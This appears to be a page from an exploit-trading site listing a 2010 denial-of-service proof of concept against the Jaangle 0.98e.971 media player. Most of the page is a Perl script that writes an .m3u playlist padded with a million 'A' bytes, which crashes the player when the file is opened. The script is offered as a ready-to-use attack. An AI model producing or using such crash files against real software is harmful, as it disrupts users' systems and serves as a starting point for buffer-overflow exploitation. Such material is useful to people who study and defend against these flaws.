[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jaangle 0.98e.971 Denial of Service Vulnerability

Author
hadji samir
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13556
Category
dos / poc
Date add
02-08-2010
Platform
windows
=================================================
Jaangle 0.98e.971 Denial of Service Vulnerability
=================================================


#!/usr/bin/perl
# jaangle 0.98e.971
# Author: s-dz        , s-dz@hotmail.fr
# Download : http://www.jaangle.com/files/jsetup.exe
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-08-02
#
# thanks TCT , DGM8
#
my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x  1000000;
 
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");



#  0day.today [2024-11-15]  #